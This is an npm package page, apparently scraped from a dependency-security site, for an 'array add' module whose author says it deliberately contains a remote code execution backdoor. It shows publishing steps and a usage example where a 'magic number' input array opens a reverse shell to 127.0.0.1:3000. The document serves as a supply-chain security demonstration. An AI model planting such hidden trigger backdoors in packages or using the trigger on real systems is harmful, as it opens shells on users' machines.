@chrisguest75/array_add_rce
Advanced tools
This is a bad module. It contains a Remote Code Execution exploit that is intentionally exploitable.
Published to : https://www.npmjs.com/package/@chrisguest75/array_add_rce
Simple steps to recreate and push to github and npm
git init
npm init --scope=@chrisguest75
hub create
It's good that the unittests pass, right?
npm test
npm publish --access public
You can use npq to install.
But it will tell you there are no vulnerabilities.
npm install @chrisguest75/array_add_rce
const [addTwoNumbers, addArrayNumbers] = require('@chrisguest75/array_add_rce');
let numbers = [1, 2, 3, 4, 5];
let answer = addArrayNumbers(numbers);
It contains a magic number that spawns a reverse shell.
const [addTwoNumbers, addArrayNumbers] = require('@chrisguest75/array_add_rce');
// Connect back to port 127.0.0.1:3000
let numbers = [967, 78, 127, 0, 0, 0, 3000];
let answer = addArrayNumbers(numbers);
Required extension
code --install-extension dbaeumer.vscode-eslint
Run linting from shell
npm run-script lint
FAQs
A really cool example array add
The npm package @chrisguest75/array_add_rce receives a total of 2 weekly downloads. As such, @chrisguest75/array_add_rce popularity was classified as not popular.
We found that @chrisguest75/array_add_rce demonstrated a not healthy version release cadence and project activity because the last version was released a year ago. It has 1 open source maintainer collaborating on the project.
Did you know?
Socket for GitHub automatically highlights issues in each pull request and monitors the health of all your open source dependencies. Discover the contents of your packages and block harmful activity before you install or update your dependencies.
Security News
Critics call the Node.js EOL CVE a misuse of the system, sparking debate over CVE standards and the growing noise in vulnerability databases.
Security News
cURL and Go security teams are publicly rejecting CVSS as flawed for assessing vulnerabilities and are calling for more accurate, context-aware approaches.
Security News
Bun 1.2 enhances its JavaScript runtime with 90% Node.js compatibility, built-in S3 and Postgres support, HTML Imports, and faster, cloud-first performance.